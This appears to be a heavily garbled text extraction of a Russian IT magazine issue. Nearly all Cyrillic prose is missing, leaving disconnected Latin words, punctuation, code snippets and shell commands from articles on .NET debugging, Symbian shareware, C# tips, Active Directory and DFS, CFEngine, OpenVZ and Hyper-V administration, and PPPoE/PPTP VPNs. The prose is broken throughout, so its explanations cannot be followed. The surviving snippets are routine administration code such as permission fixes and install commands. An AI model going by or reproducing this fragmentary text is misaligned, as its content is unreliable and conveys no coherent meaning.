visual.studio.
dll!DesignerHost.
Add
IL-
DVD
dvd
,
.NET
Framework.
HTTP://WWW
links
blogs.msdn.com/
jmstall
,
geekswithblogs.
net/.netonmymind/
archive/2006/03/14
/72262.aspx
WinDBG+SOS, adplus.
vbs,
\ adplus.vbs www.
microsoft.com/whdc/
devtools/debugging/
default.mspx.
100
.NET-
PE-, , .
, TypeRef
MemberRef. ,
, ,
.
, .NET, ILDASM ( )
Ctrl+M.
, , .NET-,
,
. , Donut
CLR- .NET . CLR COM-, .NET IMetaDataDispenser
IMetaDataDispenserEx, IMetaDataEmit IMetaDataAssemblyEmit.
.NET-
ILDASM, Microsoft
IL. , Visual
Studio.
, IT :
www.xakep.ru/magazine/xs/066/058/1.asp .NET
: (
!)
www.xakep.ru/magazine/xa/108/118/1.asp
:
Microsoft
, .
: CorDbg , GUI- DbgCLR. ,
DbgCLR Visual
Studio.
CorDbg
, .NET Framework.
CorDbg
IL- dis[assemble] , set.
,
reg.
orDbg
MSDN.
(, !)
Mdbg, Visual Studio,
CorDbg.
DBGCLR
, Visual Studio,
, .
,
.
, , System.Diagnostics.Debug.
, .NET , Assert(), ,
:
System.Diagnostics.Debug.Assert(, ...)
: System.Diagnostics
X 04 /135/ 10
>> coding
ILDASM
StackTrace,
.
GetFrame(0)
StackTrace ,
, GetMethod()
MethodBase,
.
:
StackTrace stack = new
StackTrace(0);
for(int i = 0; i <
stack.FrameCount; i++)
{
Console.WriteLine(stack.
GetFrame(i).GetMethod().Name);
}
, , .
StackTrace,
, StackTrace
Exception. , .
StackTrace Exception
() .NET FRAMEWORK
(. . )
IL- (executive)
X 04 /135/ 10
. ,
CLR. CLR ,
throw.
, CLR . ,
catch StackTrace ,
CLR. CLR
, ,
, .
Visual Studio
(managed) .
,
Unmanaged code debugging.
,
, .
, .NET
Framework 2.0
WinDBG.
! z
101
CODING
root@dtarasov.ru
,
shareware
Symbian.
, , ,
:).
SHAREWARE
Shareware
, (
)
(-, .
:) . .).
,
. ,
( ),
,
,
. 99,99%
( ),
,
,
.
, Shareware, , ,
:
,
;
( );
102
, ,
;
; .
10
,
. ,
:
;
(
);
( ,
);
;
;
.
, , , Nokia --
.
.
Symbian. ,
SHAREWARE
SYMBIAN
, , .
,
.
,
. ,
.
SYMBIAN?
target-
. .
. Symbian (
50%),
, , ,
. ,
Symbian
,
(/
SMS, , ).
, .
, ,
Symbian , ,
X 04 /135/ 10
,
.
, 30%
. 70% ,
, ,
- .
,
, .
, ,
.
, , .
.
,
.
, ( ) ,
.
X 04 /135/ 10
.
.
,
.
Symbian-, .
SYMBIAN
,
:
- .
,
Hello World.
- ++,
.
. ,
forum.nokia.com, ,
Developing
Series 60 Applications. A guide for Symbian OS
C++ Developers, Symbian Press.
. , ,
.
,
:).
,
, ++.
Symbian.
Nokia N97,
. ,
S60 , -
,
,
. ,
,
S60, .
.
, IDE, , Carbide.C++
. -
Nokia Microsoft Visual
Studio.NET. ,
SDK
.
-
, , ,
.
Symbian ,
-
, .
Symbian,
,
. ,
Symbian,
/++ ( ),
Qt. Qt
, ,
UI.
Symbian ++.
,
,
.
, ,
, ,
. ,
, ,
103
CODING
sms/mms,
, ,
, , .
,
,
.
,
,
.
,
.
, , , .
Blacklist Mobile.
, Symbian.
. ,
,
.
?
,
. ,
,
.
.
: ,
SMS
.
30 , 10 .
,
.
104
, Symbian, .
,
Symbian
(, ),
, .
,
.
Openbit,
,
. Openbit License Manager
,
,
premium sms (
100 ),
. .
2500
10% .
,
. , ,
.
95%
,
. .
, , , ?
-
. , ,
,
.
50%
!, .
,
,
. Handango, Symbiangear,
Cellmania, .
, . , ,
-, .
Ovi Store Nokia.
,
Nokia.
.
Symbian-.
-
Softkey.
, ,
-,
,
. , Softkey Nokia:
Nokia
,
.
Nokia
,
. , . :
, ,
,
. ,
. ,
,
.
.
. ,
, . -
X 04 /135/ 10
>> coding
, ,
(
pre-loading).
,
, .
,
.
.
Openbit
50000 .
. ,
, .
, .
.
. , ,
,
,
.
,
,
. ,
, , .
,
,
,
X 04 /135/ 10
.
.
SBSH Software (http://sbsn.net).
, 30% .
-
, . ,
,
. ,
,
.
, , ,
. ,
.
Windows Mobile
,
Windows.
WM, . , , (-,
. .).
.
iPhone Symbian , ,
,
AppStore
( jailbreak
1-3 ),
,
. ,
.
Android
, . , , ,
Symbian. Symbian^4
,
Symbian .
, Java, .
Blackberry ,
, Java. , ,
. Maemo
, , Nokia.
, , . ,
, ,
. Java2ME
.
.
- ,
, .
,
.
,
, .
,
,
. ,
, ,
.
, ,
. . . z
105
CODING
stannic.man@gmail.com
C#
, .
][,
C#
:).
,
C#,
.
. ,
( ),
. readonly-, .
IS IsSubclassOf()?
C#
readonly ( ):
public readonly int ReadonlyValue = 1;
public const int ConstValue = 1;
?
, readonly
.
, , ,
106
is IsSubclassOf()? , ,
?
-, is
,
MSIL asclass,
IsSubclassOf()
. is ,
null,
IsSubclassOf() . , is
, ,
IsSubclassOf() .
C#
: as
. ,
.
-
,
NullReferenceException,
as null.
,
as,
NullReferenceException, - .
.
X 04 /135/ 10
/OPTIMIZE /DEBUG
C#
:
C#?
get/set . ,
.
-, , , - :
set { param1 = value; DoSomeWorkOnChanged(); }
-, , :
set { if (value > 0) param1 = value; }.
-, ,
, , ,
:
get { return ReadFormDB(param1); }
set { WriteToDB(param1, value); }
Win32-
Win32.
C#?
Windows.Forms.IMessageFilter.
m.LParam m.WParam:
Win32-
public class Win32MessageFilter:
X 04 /135/ 10
System.Windows.Forms.IMessageFilter
{
public bool MessageFilter(ref Message m)
{
//
if(m.Msg == 513)
{
MessageBox.Show("Win32 message WM_LBUTTONDOWN");
return true;
}
return false;
}
}
static Win32MessageFilter filter =
new Win32MessageFilter();
static void Main()
{
Application.AddMessageFilter(filter);
Application.Run(new Form1() );
}
,
.
checked unchecked
C# checked unchecked,
. checked-:
byte a = 1;
byte b = 255;
107
CODING
checked
{
byte c = ( byte ) ( a + b );
byte d = Convert.ToByte( a + b );
Console.WriteLine(" { 0 } { 1 }", b + 1, c );
}
,
/checked ,
unchecked ,
.
( , ,
(). ,
.NET Framework
.
System.Object Equales, true
.
Object:
Equals
public class Object
{
public virtual Boolean Equals( Object obj )
{
if( this == obj ) return true;
return false;
}
}
, ? Equals
, .
, Equals Object
,
. , Equals:
Equals
public class Object
{
public virtual Boolean Equals( Object obj )
{
if ( obj == null ) return false;
if ( this.GetType() != obj.GetType() )
return false;
108
return true;
}
}
Equals() .
.NET , , ,
Object.ReferenceEquals().
, ,
. ,
,
. () (,
, ;)), ,
.NET- ,
.
.NET
.
, ,
; :
, CLR .
, .
SetMaxThreads GetMinThreads. , ,
SetMaxThreads,
, .
25 ,
.
, , CLR
500 . ,
SetMinThreads,
.
, ,
500 . z
X 04 /135/ 10
SYN/ACK
grinder grinder@synack.ru
urban.prankster martin@synack.ru
. , ,
.
, ,
.
,
.
ACTIVE DIRECTORY
-.
.
, ,
( ,
), , WiFi,
.
,
. , 1
. ,
.
,
.
- , .
,
.
,
,
, , . :
, ,
.
,
110
.
,
.
,
.
.
, , ,
.
(. Active
Directory ][ 04.2007 AD ][
11.2008), .
, Active Directory, Active Directory (dcpromo)
, : ,
( ), ,
( ), ,
,
-, .
,
, ,
.
, . , ,
, , ,
, , .
, , , .
-
, ,
.
,
NTFS , , , .
,
, . . ,
RDP
,
( Windows
, ][).
X 04 /135/ 10
, ( ,
). , ,
,
. , , ,
. ,
(Read-Only Domain Controller,
RODC),
, RODC
.
, .
.
,
. (Distributed File System, DFS). ,
,
, . ,
,
, ,
. , (Remote Differential
Compression RDC), ,
. ,
, ,
.
, DFS Active Directory
Standalone (), ,
, DFS.
X 04 /135/ 10
,
][ 2007 , DFS
Win2k3. Win2k8/R2 DFS ,
. DFS
.
DFS DFS.
Namespace .
. Active
Directory, .
, (
),
. , ,
. ,
.
.
:
> ServerManagerCmd -install FS-DFS FS-DFS-Namespace \
FS-DFS-Replication
DFS,
. , , .
, DFS
. ,
.
, . ,
,
.
, , . DFS, Win2k8,
,
. , .
, , , , (,
111
SYN/ACK
DFS
-, ), .
, ,
,
.
,
, ,
, .
, .
.
:
.doc , ,
. (Enable Access-Based
Active
Direcory
Active Directory ,
. , Microsoft .
Microsoft Assessment and Planning Toolkit ,
( , WMI) , ,
(Hyper-V, SQL ). Active Directory ,
.
Active Directory Sizer tool, ( , , Exchange) . , Active Directory Sizer
tool Win2k,
.
ADTest.exe Active
Directory .
, .
Active Directory Migration Tool (ADMT), ,
.
.
112
Enumeration, ABDE)
. ABDE
.
:
DFS ,
,
. ABDE
. . dfsutil. :
> dfsutil property ABDE \\synack.ru\
Namespace1
\\synack.ru\
Namespace1: ABDE
:
> dfsutil property acl grant \\srv1\
Namespace1\docs "SYNACK\
Domain Admins":R Protect Replace
:
Win2k8/Vista,
.
.
DFS . ,
Win2k8 SYSVOL
DFS.
,
.
DFS RODC, DFS
SYSVOL
.
Win2k8R2 ,
DFS
. DFS
, Standalone,
Domain-based DFS.
,
X 04 /135/ 10
, .
: ,
RDP,
. , , .
,
TS (Terminal Services)
, . Win2k Win2k3
,
Win2k8 ,
TS. RemoteApp,
, -
(TS Web Access) (TS Gateway) ( TS Win2k8
][ 09.2008).
Win2k8R2 Virtual Desktop
Infrastructure (VDI), ( ) ,
.
, R2 Terminal Services
(Remote Desktop Services, RDS),
. .
RDS Win2k8R2,
. ,
, . ,
,
. RDS , , .
VDI Hyper-V,
, ( Hyper-V
, ][ 02.2009).
,
.
, CredSSP ( Vista ),
X 04 /135/ 10
RDS
.
,
,
DoS-
. .
, - ,
, Aero (,
).
RDS
, .
. ,
(, ,
),
Windows ( / -), ,
( ).
NAP ( ][ 12.2008).
,
,
.
- RDS.
(RD Connection Broker, Win2k8
), ,
( Win2k3 Session
Directory ( )).
,
- (
).
( -
INFO
info
:
Win2k3
Active
Directory, ][_04_2007.
Win2k8 AD, ][_11_2008.
Hyper-V
,
][_02_2009.
Terminal
Services Win2k8
, ][_09_2008.
NAP
,
][_12_2008.
NLB
Win2k3 ,
][_02_2008.
Failover
Cluster Win2k8
,
][_10_2008.
113
SYN/ACK
Windows
- .
.
IIS
HTTP://WWW
links
Microsoft, Win2k8R2
www.microsoft.com/
windowsserver2008/
ru/ru.
114
), , ,
. , ,
.
.
.
. 100,
50,
, . IP-,
IP-, . , , . ,
:
IIS - , ,
,
-
.
, ,
. Win2k8/R2
IIS 7.,
,
-. IIS
, .
40 IIS, 8
, .
XML- ( %systemroot%\
windows\system32\inetsrv\config)
( IIS
Apache), - (
xcopy). .
(Shared Configuration), (AppHost.config), UNC
, -,
-.
,
(
NTFS ). IIS
. ,
, ,
.
,
. ,
. - .
(
, ),
.
IIS, .
DFS
( ) , -.
Network Load Balancing (NLB)
-.
, , , ,
.
, ,
.
. z
X 04 /135/ 10
SYN/ACK
j1m@synack.ru
CFENGINE 2
,
,
.
dssh rsync ,
. ,
.
CFENGINE (CONFIGURATION ENGINE)
,
. CFEngine
,
. .CFEngine
,
, / , / , , .
,
,
.
CFEngine
, ,
.
,
,
. ,
,
X 04 /135/ 10
,
CFEngine 2.
, CFEngine
UNIX- Linux-,
. ,
Debian/Ubuntu
:
$ sudo apt-get install cfengine2
CFEngine
:
(cfservd)
(cfagent)
(cfexecd)
cfservd ,
, .
cfagent,
CFEngine-, . ,
( ,
, . .).
cfexecd
-.
/ .
, CFEngine
, . cfrun,
( ).
cfkey
"/ ",
. cfenvd , ,
, ,
..
cfagent
, cfenvgraph
. Cfshow
CFEngine
.
var (/var/lib/cfengine2),
:
CFEngine 2
bin , /usr/
sbin
inputs ,
/etc/cfengine2
modules
ppkeys
state CFEngine
115
SYN/ACK
update.conf
cfservd.conf
Client
(cfservd
cfexecd)
cfr
un
cfa
gen
t
Policy server
(cfservd)
cfagent
update.conf
cfservd.conf
cfrun
Client
(cfservd
cfexecd)
CFEngine
, . ,
, :
.
.
, .
.
.
, .
.
, ,
,
.
,
. ,
,
.
-,
. ,
apache
, ,
apt-get install apache2,
httpd.conf.
. CFEngine , , . :
116
cfagent.conf
cfrun.hosts
cfservd.conf
:
class1::
# 'class1'
class2|class3::
# 'class2|class3'
, .
CFEngine 20
, files,
, editfiles
, packages . ,
, , . ,
- . , .
, . ,
. "" , CFEngine -,
,
. - control,
, ,
actionsequence. :
$ sudo vi /tmp/sample.conf
control:
actionsequence = ( files )
X 04 /135/ 10
files:
/etc/shadow owner=root
group=shadow mode=0640
action=fixall
,
:
1 files (
).
2 files
/etc/shadow
, (0640, root, shadow).
(, /tmp/sample.
conf) :
$ sudo cfagent -f /tmp/sample.conf
,
files
MD5- ,
( tripwire).
mountall
, fstab
mountinfo
checktimezone
netconfig
resolve /etc/
resolv.conf
unmount
packages //
shellcommands
editfiles
addmounts
directories
links
mailcheck
required
tidy
disable
files
copy
processes
module:name
,
//
X 04 /135/ 10
. Linux /etc/shadow, root:shadow, , ,
FreeBSD :
/etc/master.passwd root:wheel.
?
().
Linux-, FreeBSD:
$ sudo vi /tmp/sample.conf
control:
actionsequence = ( files )
files:
linux::
/etc/shadow owner=root
group=shadow mode=0440 action=fixall
freebsd::
/etc/master.passwd owner=root
group=wheel mode=0440 action=fixall
, , ,
CFEngine
, ,
.
, , :
$ sudo cfagent -pv
, . CFEngine
libc,
, .
,
(, Hr00 , Hr12
..),
.
CFEngine ,
.
:
$ sudo vi /tmp/sample.conf
control:
actionsequence = ( editfiles )
classes:
linux_sys = ( IsDir(/sys) )
shellcommand:
linux_sys::
"echo /sys "
- classes linux_sys,
,
/sys .
117
SYN/ACK
CFEngine , . cfkey .
/var/lib/cfengine2/
ppkeys: localhost.pub ( ) localhost.priv (
).
- /var/lib/cfengine2/ppkeys/IP-.pub.
/var/lib/cfengine2/ppkeys/root-IP-.pub.
cfkey
IsDir ,
. CFEngine
,
:
HTTP://WWW
links
www.freesource.
ru/dokumentaciya/
cfengine
CFEngine2
www.cfengine.
org/manuals/cf2Reference.html
CFengine2
INFO
info
cron.
control
cfagent.conf
:
Schedule = ( Min30_35 )
118
classes
IsNewerThan(f1,f2) , f1
f2
FileExists(f) , f
IPRange() IP- IP-
IsDefined()
IsDir(f) f
IsLink(f) f
IsPlain(f) f
Regcmp(re, ) re
Strcmp(s1,s2)
CFEngine,
:
1 CFEngine.
2 ,
CFEngine.
3 .
, ,
"". ,
.
, .
,
CFEngine ,
.
,
.
cfengine2
Ubuntu
:
1 cfagent.conf (
).
2 cfservd.conf , .
3 cfrun.hosts ().
.
:
$ sudo vi /etc/cfengine2/cfagent.conf
#
control:
#
actionsequence = ( resolve files tidy
processes )
#
domain = ( xakep.ru )
# ()
timezone = ( MSK )
# SMTP- e-mail (
)
smtpserver = ( smtp.xakep.ru )
sysadm = ( admin@xakep.ru )
# resolv.conf
resolve:
192.168.1.1
192.168.1.2
#
files:
/etc/sudoers mode=440 owner=root group=root
action=fixall
/etc/passwd mode=644 owner=root group=root
action=fixall
/etc/shadow mode=640 owner=root
group=shadow action=fixall
#
tidy:
/tmp pattern=* age=7 recurse=inf
/home pattern=*~ age=7 recurse=inf
#
processes:
# inetd
"inetd" signal=hup
X 04 /135/ 10
web-
Web- CFEngine
CFEngine,
,
.
cfservd.conf
:
$ sudo vi /etc/cfengine2/cfservd.conf
control:
domain = ( xakep.ru )
#
TrustKeysFrom = ( 192.168.1.0/24 )
any::
#
MaxConnections = ( 50 )
grant:
# , xakep.ru
/var/lib/cfengine2/inputs
*.xakep.ru
, :
. , cfrun.hosts
:
$ sudo vi /etc/cfengine2/cfrun.hosts
domain = xakep.ru
#
srv1.xakep.ru
srv2.xakep.ru
, CFEngine:
$ sudo /etc/init.d/cfengine2 restart
X 04 /135/ 10
update.conf.
,
cfagent.conf. :
$ sudo vi /etc/cfengine2/cfservd.conf
control:
domain = ( xakep.ru )
#
AllowConnectionsFrom = (
192.168.1.0/24 )
TrustKeysFrom = ( 192.168.1.0/24 )
# cfagent
cfrunCommand = ( "/usr/sbin/
cfagent" )
MaxConnections = ( 50 )
grant:
/usr/sbin/cfagent *.xakep.ru
$ sudo vi /etc/cfengine2/update.conf
control:
actionsequence = ( copy )
domain = ( xakep.ru )
CFEngine :
# cfengine
policyhost = ( cfserver.xakep.ru )
# ,
master_cfinput = ( /var/lib/
cfengine2/inputs )
#
repository = ( /var/lib/
cfengine2/outputs )
, CFEngine
.
# cfagent.conf
# /etc/cfengine2
copy:
$(master_cfinput)/cfagent.conf
dest=/etc/cfengine2/cfagent.conf
mode=600
server=$(policyhost)
force=true
trustkey=true
,
CFEngine, ,
,
.
:
$ sudo crontab -e
0,30 * * * * /var/cfengine/bin/cfexecd -F
cron cfexecd,
CFEngine,
cfagent.conf
.
cfagent.conf ,
.
CFEngine ,
.
CFEngine ,
.
WWW
, , CFEngine. z
119
SYN/ACK
Nathan Binkert nat@synack.ru
>> SYN/ACK
PLANET VIP-882:
VoIP-
IP- PLANET
VIP-88x
> :
T.30, T.38
> :
1 WAN 10/100 Mbps RJ-45
1 LAN 10/100 Mbps RJ-45
8 RJ-11 (6xFXS, 2xFXO)
> :
Voice activity detection (VAD)
Comfort noise generation (CNG)
G.165/G.168 Echo cancellation
Dynamic Jitter Buffer
> :
H.323 v2/v3/v4 SIP (RFC 3261), SDP (RFC
2327), Symmetric RTP, STUN (RFC3489),
ENUM (RFC 2916), RTP Payload for DTMF
Digits (RFC2833), Outbound Proxy Support
> :
TCP/IP, UDP/RTP/RTCP, HTTP, ICMP, ARP,
NAT, DHCP, PPPoE, DNS
> :
G.711 (A-law / u-law), G.729 AB, G.723 (6,3
Kbps / 5,3 Kbps)
> :
QoS
IP TOS (IP Precedence) / DiffServ
NAT
120
> :
IP, PPPoE, DHCP
> :
WEB, RS-232 , Telnet
> :
12
> ( x x ):
300 x 160 x 40
.
PLANET VIP-882 NAT,
.
VoIP- (QoS)
-. VoIP-
DHCP-, SNTP-, DynDNS-,
Syslog- ( Web, FTP
), , VIP882,
.
IP- 15300 .
X 04 /135/ 10
HP ProLiant ML110 G6:
,
HP ProLiant ML110 G6
> ( ):
Intel Xeon X3430 (2.40 , 95 TDP, 8
, 1333 , Turbo 1/1/2/3)
Intel Xeon X3440 (2.53 , 95 TDP, 8
, 1333 , HT, Turbo 1/1/2/3)
Intel Xeon X3450 (2.66 , 95 TDP, 8
, 1333 , HT, Turbo 1/1/4/4)
Intel Xeon X3460 (2.80 , 95 TDP, 8
, 1333 , HT, Turbo 1/1/4/5)
> :
8 DDR3 PC3-10600E 1333 ,
4
>> SYN/ACK
> :
SATA- (4
)
SAS 3.5" 1,8
SATA 3.5" 3
> :
PCI-e Gen 1, x1 (x4 connector),
> :
NC107i
> :
1
1
> :
300
> :
Micro ATX (4U)
HP
, .
,
,
, , HP ProLiant ML110 G6
.
Intel Xeon
X3400 ( , ), Intel Turbo Boost,
, DDR3,
1333 . SATA-
SAS/SATA, 1,8
3 .
PCI
Express ( ) PCI. USB-,
.
HP Tower to Rack
Conversion Tray.
HP, ML110 G6 Lights-Out 100i,
, , ,
, KVM, , telnet,
,
X 04 /135/ 10
121
SYN/ACK
grinder grinder@synack.ru
, , , . , ,
. ,
.
OPENVZ
: ,
,
.
OpenVZ (OpenVZ.
org) Linux, (Virtual
Environments, VE). ,
VE ( , ,
).
OpenVZ :
Linux.
( 4096
64 ),
,
1-3%.
,
, (venet)
IP . OpenVZ
:
,
,
.
OpenVZ Ubuntu/
Debian. 64-,
122
64- .
32- (, 4 )
. Ubuntu
LVM,
(Zero Downtime
Backup)
.
SELinux AppArmor. :
$ dmesg | grep SELinux
SELinux: Disabled at boot.
$ dmesg | grep -i AppArmor
AppArmor: AppArmor initialized
AppArmor: AppArmor Filesystem
Enabled
AppArmor
:
$ sudo/etc/init.d/apparmor stop
$ sudo update-rc.d -f apparmor remove
$ sudo apt-get remove apparmor
apparmor-utils
SELinux .
, selinux=0 , menu.
lst: kernel .... selinux=0, /etc/sysconfig/
selinux selinux=disabled. :
$ sudo setenforce 0
Ubunt' , , OpenVZ,
. ,
OpenVZ
.
OpenVZ RPM RHEL
Ubuntu 8.04 LTS.
, /etc/apt/sources.list
:
deb http://download.openvz.org/
ubuntu hardy experimental
,
:
$ sudo apt-get update
$ sudo apt-cache search openvz
:
$ sudo apt-get install linux-openvz
vzctl vzquota
, /etc/
sysctl.conf:
X 04 /135/ 10
:
$ sudo sysctl -p
VM IP-,
, OpenVZ NEIGHBOUR_DEVS all:
$ sudo nano /etc/vz/vz.conf
NEIGHBOUR_DEVS=all
(
):
WEBVZ
WebVZ (webvz.sf.net) OpenVZ, Ruby.
- (Webrick),
SQLite. WebVZ :
OpenVZ (, , ,
);
Host Node;
OpenVZ,
IP-;
- , , ;
OpenVZ;
VM;
;
.
, , . WebVZ
. 8887 8888
, firewall.
Ruby SQLite. Rails
(rubyonrails.org) , . ,
2.0.2,
WebVZ Rails 2.3.2 ( 2.3.5, 2.3.2). Ubuntu
Ubuntu on Rails Team (launchpad.net/~ubuntu-on-rails),
Ruby. , source.list:
, :
OpenVZ /vz.
,
:
deb http://ppa.launchpad.net/ubuntu-on-rails/ppa/ubuntu
hardy main
deb-src http://ppa.launchpad.net/ubuntu-on-rails/ppa/
ubuntu hardy main
, APT :
$ sudo ln -s /var/lib/vz /vz
/vz/template/cache
, ( wiki.openvz.org/Download/template/precreated).
Ubuntu:
$ wget -c http://download.openvz.org/template/
precreated/contrib/ubuntu-8.04.2-i386-minimal.tar.gz
$ sudo cp -v ubuntu-8.04.2-i386-minimal.tar.gz /vz/
template/cache
. ,
.
VM ,
.
OpenVZ, modernadmin.com/downloads/?d=ostemplates/xen.
X 04 /135/ 10
:
$ sudo apt-get install ruby rubygems libsqlite3-ruby \
sqlite3 irb libopenssl-ruby libreadline-ruby rdoc
,
rubygems, ,
:
$ sudo gem update --system
gem install ,
rubygems :
123
SYN/ACK
HyperV_Mon
INFO
OpenVZ
info
OpenVZ
. OpenVZ
(
Linux-),
OpenVZ
:
.
Authorization Manager
(AzMan.msc)
VM
Hyper-V.
$ wget -c http://rubyforge.org/frs/download.
php/60718/rubygems-1.3.5.tgz
$ tar xzvf rubygems-1.3.5.tgz
$ cd rubygems-1.3.5
$ sudo ruby setup.rb
$ sudo ln -s /usr/bin/gem1.8 /usr/bin/gem
-v=2.3.2,
, WebVZ
,
RAILS_GEM_VERSION config/environment.rb.
:
$ rails -v
Rails 2.3.5
WebVZ .
WebVZ.
, Git.
:
$ sudo apt-get install git-core
WebVZ:
$ git-clone git://github.com/shuaibzahda/
webvz.git
DVD
dvd
,
OpenVZ + WebVZ
Ubuntu Linux.
124
webvz , /var. ,
:
$ cd webvz/
$ sudo ruby script/server
=> Booting WEBrick
=> Rails 2.3.5 application starting on
http://0.0.0.0:3000
=> Call with -d to detach
=> Ctrl-C to shutdown server
[2010-01-29 14:08:01] INFO WEBrick 1.3.1
, ,
, WebVZ
. ,
, '-d':
$ sudo ruby script/server -d
=> Booting WEBrick
=> Rails 2.3.5 application starting on
http://0.0.0.0:3000
/etc/init.d/webvz:
cd /usr/local/webvz/ && /usr/bin/ruby \
-d script/server
exit 0
: http://192.168.1.200:3000/. ,
admin admin123. WebVZ Containers,
OS-Templates, Configuration files, OpenVZ ( )
Users.
Containers Personalize ( ). 3-4
.
Users, , , .
admin,
Change Password.
Vtonf
Vtonf (http://sourceforge.net/projects/vtonf)
-
OpenVZ.
. Vtonf RedHat, Fedora
CentOS.
X 04 /135/ 10
Live Migration
WebVZ
,
(Administration) (Client).
OS-Templates OpenVZ. ,
, ,
,
OpenVZ.
, Containers
New Container ,
,
, , ID, , IP-, , DNS-
root. Create
.
- . , , , ,
.
OS-Templates Re-Create Template,
.
HYPERVM
HyperVM (lxcenter.org)
,
(VPS/VDS). ,
-, .
, HyperVM
Proxmox Virtual
Environment
Proxmox VE (http://pve.proxmox.com/wiki/Main_
Page) Linux
OpenVZ KVM.
web-
,
.
1.5
GPLv2
ISO- 327
DVD-.
X 04 /135/ 10
,
. ,
, ,
. ,
?
. Live Migration.
Hyper-V, XenEnterprise, VMware ( VMotion). (
60300 ), , VM
, TCP- .
: VM , ,
. VM, , .
, , .
VM ,
, .
,
- .
OpenVZ Xen.
, .
(Resource Plan),
: VPS,
, , .
Xen, OpenVZ,
,
,
OpenVZ Only Xen Only.
HyperVM ,
SSH, ,
, .
, Ajax.
IP-, , .
HyperVM ,
- Vaserv (
2009) LxLabs AGPL-3.0,
SVN .
, RHEL-based
( CentOS).
, : This Operating
System is Currently Not supported.
( virtualization-type xen/openvz/NONE):
HTTP://WWW
links
OpenVZ
openvz.org
OpenVZ wiki.
openvz.org/Download/
template/precreated
WebVZ webvz.
sf.net
HyperVM
lxcenter.org
HyperVM :
http://demo.hypervm.
com:8888
SCVMM
2008 microsoft.com/
systemcenter/
virtualmachinem
anager
PowerShell
management Library
for Hyper-V pshyperv.
codeplex.com
HVRemote code.
msdn.microsoft.com/
HVRemote
125
SYN/ACK
WebVZ
$ wget -c http://download.lxcenter.
org/download/hypervm/production/
hypervm-install-master.sh
$ sudo sh ./hypervm-install-master.sh
--virtualization-type=openvz
. , hypervm-install-master.
sh ,
hypervm-install-slave.sh.
HYPER-V
Microsoft Hyper-V,
Windows 2008 , Microsoft Hyper-V Server 2008
(, , ). Hyper-V
(X_02_2009),
,
,
.
Hyper-V
, Hyper-V Tools,
Hyper-V , Hyper-V
(Hyper-V Manager). ,
Win2k8 , Hyper-V.
, ,
,
(Server Core). Vista Hyper-V
(support.microsoft.com/kb/952627 support.microsoft.com/kb/970203). Win7
, Remote Server
Administration Tools for Windows 7 (RSAT),
, , Hyper-V, Active Directory,
DHCP, DNS, , RDP, BitLocker, GPO, Network Load Balancing ..
RSAT for Win7 ,
.
Windows Firewall:
126
HyperVM
DCOM
DCOMcnfg.exe.
-
. , Hyper-V,
HVRemote (Hyper-V Remote
Management Configuration Utility, code.msdn.
microsoft.com/HVRemote).
,
, WF .
, , :
> cscript hvremote /add:synack\user
:
> cscript hvremote /remove:synack\
user
MMC Windows Firewall, :
> cscript hvremote.wsf /mmc:enable
:
> cscript hvremote.wsf /show
/target:computername
Hyper-V Powershell Snap in
(powershellhyperv.codeplex.com)
,
Hyper-V
.
,
Visual Studio.
PowerShell management Library for Hyper-V
(pshyperv.codeplex.com) 80
HVRemote
PowerShell-, , , VM,
, VHD-
VM.
- Hyper-V Web
Manager (HVWM, hvwm.codeplex.com),
Virtualization WMI,
VM,
.
HyperV_Mon (www.
tmurgent.com/tools.aspx)
VM
, . HyperV_Mon
, , VM.
Citrix Systems
IT-,
Citrix Essentials for Hyper-V
Express Edition (deliver.citrix.com/go/citrix/
ehvexpress).
Hyper-V, Fibre Channel
iSCSI .
, ,
SCVMM 2008 (System Center Virtual
Machine Manager, microsoft.com/systemcenter/
virtualmachinemanager),
, Hyper-V,
Microsoft Virtual Server 2005, VMware
ESX/ESXi, .
,
,
. ,
, ,
. z
X 04 /135/ 10
8.5
DVD
!
660 . !
? ?
.
.
( )
.
2100 .
72 000 QIWI ()
.
?
8(495)780-88-29 ( ) 8(800)200-3-999
( ,
, ).
,
info@glc.ru
1.
, ,
shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c
,
.
, ,
.
:
2100 . 12
1200 . 6
.
,
SYN/ACK
grinder grinder@synack.ru
urban.prankster martin@synack.ru
VPN
.
,
VPN , , , . , ,
, .
.
VPN ?
: -
.
,
,
. LAN
,
.
PPPoE PPTP,
hostto-network. , ?
.
PPPoE PPTP :
, *nix.
. Windows PPPoE PPTP
,
.
, , ,
.
OpenVPN,
,
- NAT.
- VPN ,
,
128
, ,
.
,
. L2TP/
IPsec
,
, ,
,
PPPoE PPTP /
.
VPN,
,
IP, IP ,
,
PPTP,
, OpenVPN L2TP/IPsec,
.
PPPoE PPTP .
PPPOE
PPPoE (Point-to-point protocol
over Ethernet, RFC 2516) ,
.
Windows, *nix
. , PPP
,
.
PADI- (PPPoE
Active Discovery Initiation),
,
IP- ,
PPTP. , ,
, ,
.
,
PPPoE
.
*nix pppoe-discovery,
PADI
, MAC-.
# pppoe-discovery -I eth0
Access-Concentrator: MT-01
.
PPPoE ,
,
/etc/ppp/peers/
dsl-provider:
# nano /etc/ppp/peers/dsl-provider
plugin rp-pppoe.so
rp_pppoe_ac MT-01
eth0
X 04 /135/ 10
: DHCP, DNS . PPPoE
RADIUS. PPPoE . Ethernet, IP- . ,
,
. PPPoE . ,
PPPoE WiFi : .
WiFi Wired LAN, PPPoE .
, MTU.
, Ethernet- 1500 ,
, PPPoE, 1492
( PPPoE 6 PPP Protocol ID 2 ). Path MTU Discovery,
.
ICMP (
3, 4: Fragmentaion Needed and DF set, . www.oav.net/mirrors/
cidr.html). , - ICMP ,
. MTU . , :
> ping synack.ru -f -l 1492
, .
, 1492 .
X 04 /135/ 10
MTU, MSS
(Maximum Segment Size, ),
40 (20 IP 20 TCP),
MTU.
ifconfig MTU :
# ifconfig ppp0 mtu 1400
129
SYN/ACK
IPSEC
, .
() TCP- ( 1723).
( Generic Routing
Encapsulation, GRE).
PPPoE, PPTP
. , , IP- .
. , ,
,
. , PPTP
Windows (Microsoft
), .
*nix ,
pptp-client (pptpclient.
sf.net),
. MPPE
. MPPE
. , MPPE
Linux 2.6.14,
.
: PAP, CHAP, SPAP, MSCHAP v1 v2,
EAP. /
,
PPTP
. :
LM-, RC4, CHAP, MSCHAP v1
v2 .
asleap (willhackforsushi.com/
Asleap.html) PPTP
MSCHAP . , PPTP,
VPN ( , , ),
.
, PPTP
EAP-TLS (Extensible Authentication
Protocol-Transport Layer Security) . ,
,
130
NF_CONNTRACK_PPTP
PPTP
. ,
PPTP , VPN .
LAN,
VPN-.
